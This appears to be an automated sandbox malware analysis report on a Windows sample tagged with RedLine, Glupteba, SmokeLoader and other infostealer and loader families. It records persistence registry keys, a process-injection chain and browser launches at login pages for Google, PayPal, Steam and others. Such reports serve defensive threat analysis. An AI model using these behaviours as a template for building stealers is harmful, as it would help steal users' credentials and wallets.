Malware Analysis Report

2024-11-13 19:11

Sample ID 231111-z4w4ksbf4s
Target afa1a1360224b51648fe7c1cb3233199f0c9c41605d0a7107dfc050ec4d6c733
SHA256 afa1a1360224b51648fe7c1cb3233199f0c9c41605d0a7107dfc050ec4d6c733
Tags glupteba mystic redline smokeloader stealc zgrat taiga up3 backdoor dropper evasion infostealer loader persistence rat spyware stealer trojan
Score 10/10

Table of Contents

Analysis Overview
MITRE ATT&CK
    Enterprise Matrix V15
Analysis: static1
    Detonation Overview
    Signatures
Analysis: behavioral1
    Detonation Overview
    Command Line
    Signatures
    Processes
    Network
    Files

Analysis Overview

score
10/10

SHA256

afa1a1360224b51648fe7c1cb3233199f0c9c41605d0a7107dfc050ec4d6c733

Threat Level: Known bad

The file afa1a1360224b51648fe7c1cb3233199f0c9c41605d0a7107dfc050ec4d6c733 was found to be: Known bad.

Malicious Activity Summary

glupteba mystic redline smokeloader stealc zgrat taiga up3 backdoor dropper evasion infostealer loader persistence rat spyware stealer trojan

ZGRat

Glupteba payload

SmokeLoader

Mystic

RedLine

Stealc

Glupteba

Detect Mystic stealer payload

RedLine payload

Detect ZGRat V1

Downloads MZ/PE file

Stops running service(s)

Executes dropped EXE

Adds Run key to start application

Accesses cryptocurrency files/wallets, possible credential harvesting

AutoIT Executable

Suspicious use of SetThreadContext

Launches sc.exe

Unsigned PE

Program crash

Enumerates physical storage devices

Suspicious use of WriteProcessMemory

Enumerates system info in registry

Suspicious use of SendNotifyMessage

Suspicious use of FindShellTrayWindow

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Checks SCSI registry key(s)

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: MapViewOfSection

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-11-11 21:16

Signatures

Unsigned PE

Analysis: behavioral1

Detonation Overview

Submitted

2023-11-11 21:16

Reported

2023-11-11 21:19

Platform

win10v2004-20231023-en

Max time kernel

39s

Max time network

157s

Command Line

"C:\Users\Admin\AppData\Local\Temp\afa1a1360224b51648fe7c1cb3233199f0c9c41605d0a7107dfc050ec4d6c733.exe"

Signatures

Detect Mystic stealer payload

Detect ZGRat V1

Glupteba

loader dropper glupteba

Glupteba payload

Mystic

stealer mystic

RedLine

infostealer redline

RedLine payload

SmokeLoader

trojan backdoor smokeloader

Stealc

stealer stealc

ZGRat

rat zgrat

Downloads MZ/PE file

Stops running service(s)

evasion

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence

Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\yV8Rq22.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\GJ6iM34.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\IW8qq02.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\afa1a1360224b51648fe7c1cb3233199f0c9c41605d0a7107dfc050ec4d6c733.exe N/A

AutoIT Executable

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\System32\sc.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\7KP38yy.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\7KP38yy.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\7KP38yy.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\7KP38yy.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\7KP38yy.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1Nr74BH7.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1Nr74BH7.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3620 wrote to memory of 2100 N/A C:\Users\Admin\AppData\Local\Temp\afa1a1360224b51648fe7c1cb3233199f0c9c41605d0a7107dfc050ec4d6c733.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\yV8Rq22.exe
PID 2100 wrote to memory of 2344 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\yV8Rq22.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\GJ6iM34.exe
PID 2344 wrote to memory of 3668 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\GJ6iM34.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\IW8qq02.exe
PID 3668 wrote to memory of 3340 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\IW8qq02.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1Nr74BH7.exe
PID 3340 wrote to memory of 2120 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1Nr74BH7.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3340 wrote to memory of 3752 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1Nr74BH7.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3340 wrote to memory of 836 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1Nr74BH7.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 836 wrote to memory of 1900 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3752 wrote to memory of 4460 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3340 wrote to memory of 1464 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1Nr74BH7.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2120 wrote to memory of 4116 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1464 wrote to memory of 3880 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3340 wrote to memory of 4344 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1Nr74BH7.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4344 wrote to memory of 812 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3340 wrote to memory of 4324 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1Nr74BH7.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4324 wrote to memory of 4392 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3340 wrote to memory of 3588 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1Nr74BH7.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3588 wrote to memory of 872 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3340 wrote to memory of 3944 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1Nr74BH7.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3944 wrote to memory of 1116 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3340 wrote to memory of 4812 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1Nr74BH7.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4812 wrote to memory of 3660 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3340 wrote to memory of 4652 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1Nr74BH7.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4652 wrote to memory of 2228 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3668 wrote to memory of 1212 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\IW8qq02.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2ne4059.exe
PID 4324 wrote to memory of 1968 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe


Processes

C:\Users\Admin\AppData\Local\Temp\afa1a1360224b51648fe7c1cb3233199f0c9c41605d0a7107dfc050ec4d6c733.exe

"C:\Users\Admin\AppData\Local\Temp\afa1a1360224b51648fe7c1cb3233199f0c9c41605d0a7107dfc050ec4d6c733.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\yV8Rq22.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\yV8Rq22.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\GJ6iM34.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\GJ6iM34.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\IW8qq02.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\IW8qq02.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1Nr74BH7.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1Nr74BH7.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x168,0x16c,0x170,0x144,0x174,0x7ff8f59946f8,0x7ff8f5994708,0x7ff8f5994718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ff8f59946f8,0x7ff8f5994708,0x7ff8f5994718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://store.steampowered.com/login/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ff8f59946f8,0x7ff8f5994708,0x7ff8f5994718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ff8f59946f8,0x7ff8f5994708,0x7ff8f5994718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://twitter.com/i/flow/login

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x178,0x17c,0x180,0x154,0x184,0x7ff8f59946f8,0x7ff8f5994708,0x7ff8f5994718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://steamcommunity.com/openid/loginform/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ff8f59946f8,0x7ff8f5994708,0x7ff8f5994718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.epicgames.com/id/login

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x174,0x178,0x17c,0x150,0x180,0x7ff8f59946f8,0x7ff8f5994708,0x7ff8f5994718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.paypal.com/signin

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ff8f59946f8,0x7ff8f5994708,0x7ff8f5994718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ff8f59946f8,0x7ff8f5994708,0x7ff8f5994718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ff8f59946f8,0x7ff8f5994708,0x7ff8f5994718

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2ne4059.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2ne4059.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2172,12282619515920077255,18350766789350249296,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2236 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2080,3047211895264663266,15721604572363523781,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2148 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2036,9635004217065434973,11661739386978840583,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2092 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2080,3047211895264663266,15721604572363523781,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2088 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2164,7299178135159070975,8079948826552501164,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2224 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,2297421747794827770,12801585796260566915,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3048 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,2297421747794827770,12801585796260566915,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3040 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2052,13319299788781063699,14241595865526302181,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2156 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2052,13319299788781063699,14241595865526302181,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2016 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2180,1277284653793961071,16103096436263094128,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2236 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2180,1277284653793961071,16103096436263094128,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2188 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2164,9603333117890698905,11035407571429318320,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2224 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2164,9603333117890698905,11035407571429318320,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1920 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

